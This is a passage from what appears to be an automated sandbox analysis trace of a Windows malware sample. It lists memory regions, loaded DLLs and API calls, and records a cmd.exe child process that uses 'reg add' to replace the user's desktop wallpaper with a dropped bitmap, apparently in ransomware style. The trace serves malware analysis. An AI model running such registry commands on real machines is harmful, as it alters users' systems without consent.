0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 512 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 774 start_va = 0xe836e80000 end_va = 0xe836e86fff entry_point = 0x0 region_type = private name = "private_0x000000e836e80000" filename = "" Region: id = 775 start_va = 0xe836e90000 end_va = 0xe836e94fff entry_point = 0xe836e90000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 776 start_va = 0xe836ef0000 end_va = 0xe836ef0fff entry_point = 0xe836ef0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 777 start_va = 0xe836f00000 end_va = 0xe836f01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e836f00000" filename = "" Region: id = 778 start_va = 0xe8394f0000 end_va = 0xe8394f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e8394f0000" filename = "" Region: id = 779 start_va = 0xe839500000 end_va = 0xe839501fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e839500000" filename = "" Region: id = 780 start_va = 0xe839510000 end_va = 0xe83960ffff entry_point = 0x0 region_type = private name = "private_0x000000e839510000" filename = "" Region: id = 781 start_va = 0xe839610000 end_va = 0xe83980efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e839610000" filename = "" Region: id = 782 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 783 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 784 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 785 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Thread: id = 16 os_tid = 0xbe8 Thread: id = 17 os_tid = 0xa24 Thread: id = 18 os_tid = 0xa44 Thread: id = 19 os_tid = 0x850 Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x72439000" os_pid = "0xf9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 800 start_va = 0xfd0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 801 start_va = 0xff0000 end_va = 0xff1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 802 start_va = 0x1000000 end_va = 0x1013fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001000000" filename = "" Region: id = 803 start_va = 0x1020000 end_va = 0x105ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 804 start_va = 0x1060000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 805 start_va = 0x1160000 end_va = 0x1163fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 806 start_va = 0x1170000 end_va = 0x1170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 807 start_va = 0x1180000 end_va = 0x1181fff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 808 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 809 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 810 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 811 start_va = 0x7ee10000 end_va = 0x7ee32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee10000" filename = "" Region: id = 812 start_va = 0x7ee36000 end_va = 0x7ee36fff entry_point = 0x0 region_type = private name = "private_0x000000007ee36000" filename = "" Region: id = 813 start_va = 0x7ee3c000 end_va = 0x7ee3efff entry_point = 0x0 region_type = private name = "private_0x000000007ee3c000" filename = "" Region: id = 814 start_va = 0x7ee3f000 end_va = 0x7ee3ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee3f000" filename = "" Region: id = 815 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 816 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 817 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 818 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 819 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 840 start_va = 0x11c0000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 841 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 842 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 843 start_va = 0x1200000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 844 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 965 start_va = 0xfd0000 end_va = 0xfdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 966 start_va = 0x1300000 end_va = 0x13bdfff entry_point = 0x1300000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 967 start_va = 0x5420000 end_va = 0x545ffff entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 968 start_va = 0x5460000 end_va = 0x555ffff entry_point = 0x0 region_type = private name = "private_0x0000000005460000" filename = "" Region: id = 969 start_va = 0x5690000 end_va = 0x569ffff entry_point = 0x0 region_type = private name = "private_0x0000000005690000" filename = "" Region: id = 970 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 971 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 972 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 973 start_va = 0x7ed10000 end_va = 0x7ee0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed10000" filename = "" Region: id = 974 start_va = 0x7ee39000 end_va = 0x7ee3bfff entry_point = 0x0 region_type = private name = "private_0x000000007ee39000" filename = "" Region: id = 975 start_va = 0xfe0000 end_va = 0xfe3fff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 1023 start_va = 0xff0000 end_va = 0xff3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 1025 start_va = 0x56a0000 end_va = 0x59d6fff entry_point = 0x56a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 92 os_tid = 0xfa0 [0196.498] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0196.498] __set_app_type (_Type=0x1) [0196.498] __p__fmode () returned 0x77984d6c [0196.498] __p__commode () returned 0x77985b1c [0196.498] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0196.498] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0196.499] GetCurrentThreadId () returned 0xfa0 [0196.499] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfa0) returned 0x84 [0196.499] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0196.499] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0196.499] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.717] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.717] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x115f74c | out: phkResult=0x115f74c*=0x0) returned 0x2 [0196.718] VirtualQuery (in: lpAddress=0x115f753, lpBuffer=0x115f704, dwLength=0x1c | out: lpBuffer=0x115f704*(BaseAddress=0x115f000, AllocationBase=0x1060000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.718] VirtualQuery (in: lpAddress=0x1060000, lpBuffer=0x115f704, dwLength=0x1c | out: lpBuffer=0x115f704*(BaseAddress=0x1060000, AllocationBase=0x1060000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0196.718] VirtualQuery (in: lpAddress=0x1061000, lpBuffer=0x115f704, dwLength=0x1c | out: lpBuffer=0x115f704*(BaseAddress=0x1061000, AllocationBase=0x1060000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0196.718] VirtualQuery (in: lpAddress=0x1063000, lpBuffer=0x115f704, dwLength=0x1c | out: lpBuffer=0x115f704*(BaseAddress=0x1063000, AllocationBase=0x1060000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.718] VirtualQuery (in: lpAddress=0x1160000, lpBuffer=0x115f704, dwLength=0x1c | out: lpBuffer=0x115f704*(BaseAddress=0x1160000, AllocationBase=0x1160000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0196.718] GetConsoleOutputCP () returned 0x1b5 [0197.154] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0197.155] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0197.155] _get_osfhandle (_FileHandle=1) returned 0x3c [0197.155] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0199.655] _get_osfhandle (_FileHandle=1) returned 0x3c [0199.655] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0199.902] _get_osfhandle (_FileHandle=1) returned 0x3c [0199.902] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0199.996] _get_osfhandle (_FileHandle=0) returned 0x38 [0199.996] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0200.184] _get_osfhandle (_FileHandle=0) returned 0x38 [0200.184] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0200.445] GetEnvironmentStringsW () returned 0x12080a8* [0200.445] FreeEnvironmentStringsA (penv="A") returned 1 [0200.446] GetEnvironmentStringsW () returned 0x12080a8* [0200.446] FreeEnvironmentStringsA (penv="A") returned 1 [0200.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x115e6b0 | out: phkResult=0x115e6b0*=0x94) returned 0x0 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x0, lpData=0x115e6bc*=0xf8, lpcbData=0x115e6b8*=0x1000) returned 0x2 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x4, lpData=0x115e6bc*=0x1, lpcbData=0x115e6b8*=0x4) returned 0x0 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x0, lpData=0x115e6bc*=0x1, lpcbData=0x115e6b8*=0x1000) returned 0x2 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x4, lpData=0x115e6bc*=0x0, lpcbData=0x115e6b8*=0x4) returned 0x0 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x4, lpData=0x115e6bc*=0x40, lpcbData=0x115e6b8*=0x4) returned 0x0 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x4, lpData=0x115e6bc*=0x40, lpcbData=0x115e6b8*=0x4) returned 0x0 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x0, lpData=0x115e6bc*=0x40, lpcbData=0x115e6b8*=0x1000) returned 0x2 [0200.446] RegCloseKey (hKey=0x94) returned 0x0 [0200.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x115e6b0 | out: phkResult=0x115e6b0*=0x94) returned 0x0 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x0, lpData=0x115e6bc*=0x40, lpcbData=0x115e6b8*=0x1000) returned 0x2 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x4, lpData=0x115e6bc*=0x1, lpcbData=0x115e6b8*=0x4) returned 0x0 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x0, lpData=0x115e6bc*=0x1, lpcbData=0x115e6b8*=0x1000) returned 0x2 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x4, lpData=0x115e6bc*=0x0, lpcbData=0x115e6b8*=0x4) returned 0x0 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x4, lpData=0x115e6bc*=0x9, lpcbData=0x115e6b8*=0x4) returned 0x0 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x4, lpData=0x115e6bc*=0x9, lpcbData=0x115e6b8*=0x4) returned 0x0 [0200.446] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x115e6b4, lpData=0x115e6bc, lpcbData=0x115e6b8*=0x1000 | out: lpType=0x115e6b4*=0x0, lpData=0x115e6bc*=0x9, lpcbData=0x115e6b8*=0x1000) returned 0x2 [0200.446] RegCloseKey (hKey=0x94) returned 0x0 [0200.446] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb43251 [0200.446] srand (_Seed=0x5bb43251) [0200.446] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f" [0200.447] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f" [0200.447] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0200.447] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12080b0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0200.447] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0200.447] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0200.447] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0200.447] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0200.447] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0200.447] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0200.447] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0200.447] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0200.447] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0200.447] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0200.447] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0200.447] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0200.447] GetEnvironmentStringsW () returned 0x12082c0* [0200.447] FreeEnvironmentStringsA (penv="A") returned 1 [0200.447] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.447] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0200.447] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0200.447] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0200.447] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0200.447] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0200.447] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0200.448] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0200.448] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0200.448] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0200.448] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x115f488 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0200.448] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x115f488, lpFilePart=0x115f480 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x115f480*="Desktop") returned 0x1d [0200.448] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0200.448] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x115f208 | out: lpFindFileData=0x115f208) returned 0x12005c8 [0200.448] FindClose (in: hFindFile=0x12005c8 | out: hFindFile=0x12005c8) returned 1 [0200.448] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x115f208 | out: lpFindFileData=0x115f208) returned 0x12005c8 [0200.448] FindClose (in: hFindFile=0x12005c8 | out: hFindFile=0x12005c8) returned 1 [0200.448] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0200.448] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x115f208 | out: lpFindFileData=0x115f208) returned 0x12005c8 [0200.448] FindClose (in: hFindFile=0x12005c8 | out: hFindFile=0x12005c8) returned 1 [0200.448] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0200.448] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0200.448] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0200.449] GetEnvironmentStringsW () returned 0x12082c0* [0200.449] FreeEnvironmentStringsA (penv="=") returned 1 [0200.449] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0200.449] GetConsoleOutputCP () returned 0x1b5 [0200.621] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0200.621] GetUserDefaultLCID () returned 0x409 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x115f5b8, cchData=128 | out: lpLCData="0") returned 2 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x115f5b8, cchData=128 | out: lpLCData="0") returned 2 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x115f5b8, cchData=128 | out: lpLCData="1") returned 2 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0200.622] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0200.622] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0200.623] GetConsoleTitleW (in: lpConsoleTitle=0x120ad00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.665] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0200.665] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0200.665] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0200.665] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0200.666] _wcsicmp (_String1="reg", _String2=")") returned 73 [0200.666] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0200.666] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0200.666] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0200.666] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0200.666] _wcsicmp (_String1="REM", 